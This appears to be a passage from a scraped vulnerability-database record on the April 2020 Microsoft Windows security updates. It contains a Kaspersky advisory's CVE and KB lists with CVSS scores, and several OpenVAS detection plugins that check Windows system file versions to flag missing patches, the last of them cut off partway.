\n[CVE-2020-1020](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1020>)6.8High \n[CVE-2020-1027](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1027>)7.2High \n[CVE-2020-0938](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0938>)6.8High \n[CVE-2020-0955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0955>)2.1Warning \n[CVE-2020-0985](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0985>)7.2High \n[CVE-2020-0983](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0983>)7.2High \n[CVE-2020-0981](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0981>)4.6Warning \n[CVE-2020-0942](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0942>)3.6Warning \n[CVE-2020-0947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0947>)4.3Warning \n[CVE-2020-0948](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0948>)9.3Critical \n[CVE-2020-0949](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0949>)9.3Critical \n[CVE-2020-0945](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0945>)4.3Warning \n[CVE-2020-0784](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0784>)7.2High \n[CVE-2020-0910](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0910>)7.7Critical \n[CVE-2020-1003](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1003>)7.2High \n[CVE-2020-0913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0913>)7.2High \n[CVE-2020-1029](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1029>)7.2High \n[CVE-2020-0944](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0944>)4.6Warning \n[CVE-2020-0996](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0996>)7.2High \n[CVE-2020-0950](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0950>)9.3Critical \n[CVE-2020-0939](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0939>)4.3Warning \n[CVE-2020-0918](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0918>)7.4High \n[CVE-2020-1006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1006>)7.2High \n[CVE-2020-0888](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0888>)7.2High \n[CVE-2020-0917](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0917>)7.4High \n[CVE-2020-0937](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0937>)4.3Warning \n[CVE-2020-0936](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0936>)3.6Warning \n[CVE-2020-0934](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0934>)4.6Warning \n[CVE-2020-1017](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1017>)7.2High \n[CVE-2020-1016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1016>)2.1Warning \n[CVE-2020-0794](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0794>)4.9Warning \n[CVE-2020-0940](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0940>)7.2High \n[CVE-2020-1001](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1001>)7.2High \n[CVE-2020-0699](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0699>)2.1Warning\n\n### *KB list*:\n[4549949](<http://support.microsoft.com/kb/4549949>) \n[4550927](<http://support.microsoft.com/kb/4550927>) \n[4550929](<http://support.microsoft.com/kb/4550929>) \n[4550917](<http://support.microsoft.com/kb/4550917>) \n[4549951](<http://support.microsoft.com/kb/4549951>) \n[4550971](<http://support.microsoft.com/kb/4550971>) \n[4550961](<http://support.microsoft.com/kb/4550961>) \n[4550922](<http://support.microsoft.com/kb/4550922>) \n[4550930](<http://support.microsoft.com/kb/4550930>) \n[4550970](<http://support.microsoft.com/kb/4550970>) \n[4571692](<http://support.microsoft.com/kb/4571692>) \n[4571694](<http://support.microsoft.com/kb/4571694>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "kaspersky", "title": "KLA11744 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0699", "CVE-2020-0784", "CVE-2020-0794", "CVE-2020-0821", "CVE-2020-0888", "CVE-2020-0889", "CVE-2020-0907", "CVE-2020-0910", "CVE-2020-0913", "CVE-2020-0917", "CVE-2020-0918", "CVE-2020-0934", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0939", "CVE-2020-0940", "CVE-2020-0942", "CVE-2020-0944", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0947", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0981", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0996", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1001", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1006", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1017", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1029", "CVE-2020-1094"], "modified": "2020-09-10T00:00:00", "id": "KLA11744", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11744/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-07-21T19:50:56", "description": "This host is missing a critical security\n update according to Microsoft KB4550964", "cvss3": {}, "published": "2020-04-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4550964)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0967", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0958", "CVE-2020-0987", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0959", "CVE-2020-0956", "CVE-2020-0953", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0993", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-1000", "CVE-2020-1011", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-0957", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310816823", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816823", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816823\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0687\", \"CVE-2020-0821\", \"CVE-2020-0889\", \"CVE-2020-0895\",\n \"CVE-2020-0938\", \"CVE-2020-0946\", \"CVE-2020-0952\", \"CVE-2020-0953\",\n \"CVE-2020-0955\", \"CVE-2020-0956\", \"CVE-2020-0957\", \"CVE-2020-0958\",\n \"CVE-2020-0959\", \"CVE-2020-0960\", \"CVE-2020-0962\", \"CVE-2020-0964\",\n \"CVE-2020-0965\", \"CVE-2020-0966\", \"CVE-2020-0967\", \"CVE-2020-0968\",\n \"CVE-2020-0982\", \"CVE-2020-0987\", \"CVE-2020-0988\", \"CVE-2020-0992\",\n \"CVE-2020-0993\", \"CVE-2020-0994\", \"CVE-2020-0995\", \"CVE-2020-0999\",\n \"CVE-2020-1000\", \"CVE-2020-1004\", \"CVE-2020-1005\", \"CVE-2020-1007\",\n \"CVE-2020-1008\", \"CVE-2020-1009\", \"CVE-2020-1011\", \"CVE-2020-1014\",\n \"CVE-2020-1015\", \"CVE-2020-1020\", \"CVE-2020-1027\", \"CVE-2020-1094\",\n \"CVE-2020-0907\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-15 08:39:55 +0530 (Wed, 15 Apr 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4550964)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4550964\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to\n\n - An error when the Windows kernel improperly handles objects in memory.\n\n - Multiple errors in the way Microsoft Graphics Components handle objects in\n memory.\n\n - Multiple errors when the Windows Jet Database Engine improperly handles\n objects in memory.\n\n - An error in Windows DNS when it fails to properly handle queries.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows an attacker\n to execute arbitrary code on a victim system, disclose sensitive information,\n conduct denial-of-service condition and gain elevated privileges.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4550964\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\ndllPath = smb_get_system32root();\nif(!dllPath)\n exit(0);\n\nfileVer = fetch_file_version(sysPath:dllPath, file_name:\"Win32k.sys\");\nif(!fileVer)\n exit(0);\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.24551\")) {\n report = report_fixed_ver(file_checked:dllPath + \"\\Win32k.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.24551\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:50:58", "description": "This host is missing a critical security\n update according to Microsoft KB4550961", "cvss3": {}, "published": "2020-04-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4550961)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1016", "CVE-2020-0967", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0958", "CVE-2020-0987", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0959", "CVE-2020-0956", "CVE-2020-0953", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0993", "CVE-2020-0945", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-1003", "CVE-2020-1011", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-0936", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310816824", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816824", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816824\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0687\", \"CVE-2020-0821\", \"CVE-2020-0889\", \"CVE-2020-0895\",\n \"CVE-2020-0907\", \"CVE-2020-0936\", \"CVE-2020-0938\", \"CVE-2020-0945\",\n \"CVE-2020-0946\", \"CVE-2020-0952\", \"CVE-2020-0953\", \"CVE-2020-0955\",\n \"CVE-2020-0956\", \"CVE-2020-0958\", \"CVE-2020-0959\", \"CVE-2020-0960\",\n \"CVE-2020-0962\", \"CVE-2020-0964\", \"CVE-2020-0965\", \"CVE-2020-0966\",\n \"CVE-2020-0967\", \"CVE-2020-0968\", \"CVE-2020-0982\", \"CVE-2020-0987\",\n \"CVE-2020-0988\", \"CVE-2020-0992\", \"CVE-2020-0993\", \"CVE-2020-0994\",\n \"CVE-2020-0995\", \"CVE-2020-0999\", \"CVE-2020-1003\", \"CVE-2020-1004\",\n \"CVE-2020-1005\", \"CVE-2020-1007\", \"CVE-2020-1008\", \"CVE-2020-1009\",\n \"CVE-2020-1011\", \"CVE-2020-1014\", \"CVE-2020-1015\", \"CVE-2020-1016\",\n \"CVE-2020-1020\", \"CVE-2020-1027\", \"CVE-2020-1094\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-15 08:39:55 +0530 (Wed, 15 Apr 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4550961)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4550961\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An error in the way that the scripting engine handles objects in memory\n in Internet Explorer.\n\n - Multiple errors when the Microsoft Windows Graphics Component improperly\n handles objects in memory.\n\n - An error when the Windows Jet Database Engine improperly handles objects\n in memory.\n\n - An error when the win32k component improperly provides kernel information.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows an attacker\n to execute arbitrary code on a victim system, disclose sensitive information,\n conduct denial-of-service condition and gain elevated privileges.\");\n\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64-based systems\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4550961\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"Urlmon.dll\");\nif(!sysVer)\n exit(0);\n\nif(version_is_less(version:sysVer, test_version:\"11.0.9600.19678\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Urlmon.dll\",\n file_version:sysVer, vulnerable_range:\"Less than 11.0.9600.19678\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:50:57", "description": "This host is missing a critical security\n update according to Microsoft KB4550930", "cvss3": {}, "published": "2020-04-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4550930)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0950", "CVE-2020-1016", "CVE-2020-0967", "CVE-2020-0983", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0958", "CVE-2020-0987", "CVE-2020-0784", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0959", "CVE-2020-0956", "CVE-2020-0949", "CVE-2020-0953", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0993", "CVE-2020-0945", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-0937", "CVE-2020-0985", "CVE-2020-1003", "CVE-2020-1011", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0969", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-0936", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310816826", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816826", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816826\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0687\", \"CVE-2020-0784\", \"CVE-2020-0821\", \"CVE-2020-0889\",\n \"CVE-2020-0895\", \"CVE-2020-0907\", \"CVE-2020-0936\", \"CVE-2020-0937\",\n \"CVE-2020-0938\", \"CVE-2020-0945\", \"CVE-2020-0946\", \"CVE-2020-0948\",\n \"CVE-2020-0949\", \"CVE-2020-0950\", \"CVE-2020-0952\", \"CVE-2020-0953\",\n \"CVE-2020-0955\", \"CVE-2020-0956\", \"CVE-2020-0958\", \"CVE-2020-0959\",\n \"CVE-2020-0960\", \"CVE-2020-0962\", \"CVE-2020-0964\", \"CVE-2020-0965\",\n \"CVE-2020-0966\", \"CVE-2020-0967\", \"CVE-2020-0968\", \"CVE-2020-0969\",\n \"CVE-2020-0982\", \"CVE-2020-0983\", \"CVE-2020-0985\", \"CVE-2020-0987\",\n \"CVE-2020-0988\", \"CVE-2020-0992\", \"CVE-2020-0993\", \"CVE-2020-0994\",\n \"CVE-2020-0995\", \"CVE-2020-0999\", \"CVE-2020-1003\", \"CVE-2020-1004\",\n \"CVE-2020-1005\", \"CVE-2020-1007\", \"CVE-2020-1008\", \"CVE-2020-1009\",\n \"CVE-2020-1011\", \"CVE-2020-1014\", \"CVE-2020-1015\", \"CVE-2020-1016\",\n \"CVE-2020-1020\", \"CVE-2020-1027\", \"CVE-2020-1094\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-15 08:39:55 +0530 (Wed, 15 Apr 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4550930)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4550930\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error in the way that the scripting engine handles objects in memory\n in Internet Explorer.\n\n - Multiple errors when the Microsoft Windows Graphics Component improperly\n handles objects in memory.\n\n - An error when the Windows Jet Database Engine improperly handles objects\n in memory.\n\n - An error when the Windows update stack fails to properly handle objects in\n memory.\n\n - An error when the Windows Delivery Optimization service improperly handles\n objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information and\n conduct denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4550930\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Kernel32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.10240.0\", test_version2:\"10.0.10240.18544\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Kernel32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.10240.0 - 10.0.10240.18544\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:50:56", "description": "This host is missing a critical security\n update according to Microsoft KB4550929", "cvss3": {}, "published": "2020-04-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4550929)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0950", "CVE-2020-1016", "CVE-2020-0967", "CVE-2020-0983", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0958", "CVE-2020-0987", "CVE-2020-0784", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0940", "CVE-2020-0959", "CVE-2020-1017", "CVE-2020-0956", "CVE-2020-0949", "CVE-2020-0953", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0942", "CVE-2020-0993", "CVE-2020-0945", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-0937", "CVE-2020-0985", "CVE-2020-1003", "CVE-2020-1000", "CVE-2020-1006", "CVE-2020-1011", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0969", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-0936", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310816827", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816827", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816827\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0687\", \"CVE-2020-0784\", \"CVE-2020-0821\", \"CVE-2020-0889\",\n \"CVE-2020-0895\", \"CVE-2020-0907\", \"CVE-2020-0936\", \"CVE-2020-0937\",\n \"CVE-2020-0938\", \"CVE-2020-0940\", \"CVE-2020-0942\", \"CVE-2020-0945\",\n \"CVE-2020-0946\", \"CVE-2020-0948\", \"CVE-2020-0949\", \"CVE-2020-0950\",\n \"CVE-2020-0952\", \"CVE-2020-0953\", \"CVE-2020-0955\", \"CVE-2020-0956\",\n \"CVE-2020-0958\", \"CVE-2020-0959\", \"CVE-2020-0960\", \"CVE-2020-0962\",\n \"CVE-2020-0964\", \"CVE-2020-0965\", \"CVE-2020-0966\", \"CVE-2020-0967\",\n \"CVE-2020-0968\", \"CVE-2020-0969\", \"CVE-2020-0982\", 